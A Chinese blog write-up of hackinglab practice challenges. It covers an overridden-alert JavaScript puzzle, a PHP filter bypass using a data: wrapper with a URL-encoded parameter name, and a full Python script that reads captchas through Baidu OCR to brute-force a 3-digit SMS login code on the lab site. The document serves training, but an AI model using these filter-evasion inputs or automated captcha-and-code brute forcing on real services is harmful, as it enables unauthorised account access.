hackinglab-脚本关

最新推荐文章于 2023-06-14 21:31:21 发布

阳光叶雨

最新推荐文章于 2023-06-14 21:31:21 发布

阅读量323

点赞数

分类专栏： hackinglab练习记录文章标签： python

本文链接：https://blog.csdn.net/swy1993/article/details/124252496

版权

hackinglab练习记录专栏收录该内容

1 篇文章 0 订阅

订阅专栏

4、怎么就是不弹出key呢？

分值: 150

提交说明：提交前14个字符即可过关

解题思路：

a)首先点击界面超链接没反应，先右键查看源代码；

b)先搜索alert，发现alert有两处，第二处的alert为真正需要触发的alert，上面一处alert被重写，返回了return false，导致下面一处函数的alert不生效，因此删除上面一处alert函数；

c)重新运行页面发现可以弹框，但不好复制，而且弹框内容中将alert中文本部分混淆入字符串中，无法顺利复制出变量d的前14个字符，因此添加console.log函数直接输出变量d的内容；

8、微笑一下就能过关了

分值: 150

尼玛，碰到这样的题我能笑得出来嘛...

解题思路：

a)查看index.php中的源代码，整个校验主体是$_GET方法，该方法用于收集来自 method="get" 的表单中的参数和值，所以可以确定该题需要在URL地址串后面跟?参数为“^_^”；

b)下面来看参数^_^后面的值，初始值smile为1，preg_match是一个正则表达式匹配函数，可以看到将点号，百分号，0-9的数字，各种常见传输协议等等全部过滤掉了，如果参数值中带上述内容则smile得值会被赋0，就没办法走到最后这个分支判断：

if ($smile) {
        $smile = @file_get_contents ($_GET['^_^']);
        if ($smile === "(●'◡'●)") die($flag);
    }

要走到这个分支判断必须smile为1，且file_get_contents（把整个文件读入一个字符串中的函数）需要有个文件形式传入内容，且内容中带(●'◡'●)，此时判断条件才能为真，才能走die($flag)函数，退出当前脚本，并输出一条消息，flag输出的消息就是我们要拿到的通关key；

c)经过上一步分析，我们首先需要找出一个协议，是能够传输文件内容的，这里我们用到data：伪协议，那么?后面跟的大致内容就成型了：

?^_^=data:, (●'◡'●)

data协议参考：

但是还有一句条件：

if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;

其中的$_SERVER['QUERY_STRING']含义是取请求整个URL中问号后面的参数值部分内容，举例含义参考下图，另外结合正则函数，可以发现^_^中的下划线刚好被匹配到，所以这个下划线必须经过URL编码，所以现在内容调整为：

?^%5f^=data:, (●'◡'●)

d)这样一来下面这句判断也就自动通过了，file_exists() 函数检查文件或目录是否存在，如果指定的文件或目录存在则返回 TRUE，否则返回 FALSE，经过编码，^_^不存在，返回false，也就是0，不会执行smile的赋值；

if ($smile) {
if (@file_exists ($_GET['^_^'])) $smile = 0;
}

因此答案就是：

?^%5f^=data:, (●'◡'●)

11、验证码识别

分值: 350

验证码识别
Tips:验证码依然是3位数

解题思路：

a)该关Tips明确给出该题重点为验证码识别，因此主要方向是考虑写脚本自动每次识别验证码，然后自动提交尝试暴力破解验证码：

b)经过尝试python自带的pytesseract验证码识别率低，因此改用百度OCR，识别率高，使用简单，唯一就是需要外网连网访问接口，不能本地识别，且免费使用有次数、并发量限制，但练习使用已经足够，百度OCR使用教学视频参考：

百度云智教育

脚本跑出结果：

下面直接贴出代码段：

import base64
import requests

import urllib.request
import time
import re
import sys

s=requests.Session()
url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"
head={'cookie':'PHPSESSID=2572f663cf4fbc2bbd35da2e929d2a00'}
	
def main():
	num=100
	while num<1000:
		code=get_code()
		# 此处休眠1秒防止百度ocr的qps限制导致失败
		# time.sleep(1)
		get_url(num,code)
		num+=1

#调用百度ocr识别接口
# client_id 为官网获取的AK， client_secret 为官网获取的SK
def get_token():
	host = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id=你自己的id&client_secret=你自己的secret'
	response = requests.get(host)
	if response:
		print(response.json())

#下载图片到本地，百度ocr只支持下载到本地的图片识别，貌似无法直接识别url里的验证码
def get_img():
	img_url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php"
	file_path='你自己的路径'
	file_name='你自己的路径/code.png'
	# 这里必须加headers不然虽然验证码刷新，但无法和上面的login请求关联，还是会提示验证码失效
	headers=("Cookie","PHPSESSID=2572f663cf4fbc2bbd35da2e929d2a00")
	opener = urllib.request.build_opener()
	opener.addheaders = [headers]
	urllib.request.install_opener(opener)
	urllib.request.urlretrieve(img_url,filename=file_name)

# 通用文字识别（高精度版）
def get_code():
	get_img()
	request_url = "https://aip.baidubce.com/rest/2.0/ocr/v1/accurate_basic"
	# 二进制方式打开图片文件
	f = open('/Users/wuguoxiang/Downloads/code.png', 'rb')
	img = base64.b64encode(f.read())

	params = {"image":img}
	access_token = '你自己的token'
	request_url = request_url + "?access_token=" + access_token
	headers = {'content-type': 'application/x-www-form-urlencoded'}
	response = requests.post(request_url, data=params, headers=headers)
	try:
		code=response.json()['words_result']
		# print(code)
		code=re.findall('\d\d\d\d',str(code))
		print('验证码是：',code[0])
		return code[0]
	except IndexError:
		print('百度OCR没有识别到验证码，正在重试......')
		time.sleep(0.5)
		code=response.json()['words_result']
		code=re.findall('\d\d\d\d',str(code))
		print('验证码是：',code[0])
		return code[0]
	except KeyError:
		print('QPS限制，验证码识别失败，正在重试......：')
		# 百度OCR有并发量限制，因此需要等待若干秒后重新尝试
		time.sleep(3)
		response = requests.post(request_url, data=params, headers=headers)
		code=response.json()['words_result']
		code=re.findall('\d\d\d\d',str(code))
		print('验证码是：',code[0])
		return code[0]
	except:
		print('验证码识别未知错误【1】！',sys.exc_info())

def get_url(num,code):
	data={'username':'13388886666','mobi_code':num,'user_code':code,'Login':'submit'}
	res=s.post(url,data=data,headers=head).content.decode('utf-8')

	if 'error' in res:
		print('手机验证码：',num,'---验证错误',res)
	elif '验证码失效' in res:
		print(res)
	elif '手机验证码还没发呢' in res:
		print(res)
	elif 'flag' in res:
		print('手机验证码是',num,res)
		sys.exit()
	else:
		sys.exit()
		
if __name__=='__main__':
	main()

阳光叶雨

关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
hackinglab-脚本关

4、怎么就是不弹出key呢？分值: 150提交说明：提交前14个字符即可过关解题思路：a)首先点击界面超链接没反应，先右键查看源代码；b)先搜索alert，发现alert有两处，第二处的alert为真正需要触发的alert，上面一处alert被重写，返回了return false，导致下面一处函数的alert不生效，因此删除上面一处alert函数；c)重新运行页面发现可以弹框，但不好复制，而且弹框内容中将alert中文本部分混淆入字符串中，无法顺利复制出变量d的前14个字符，因此添加c.
复制链接

扫一扫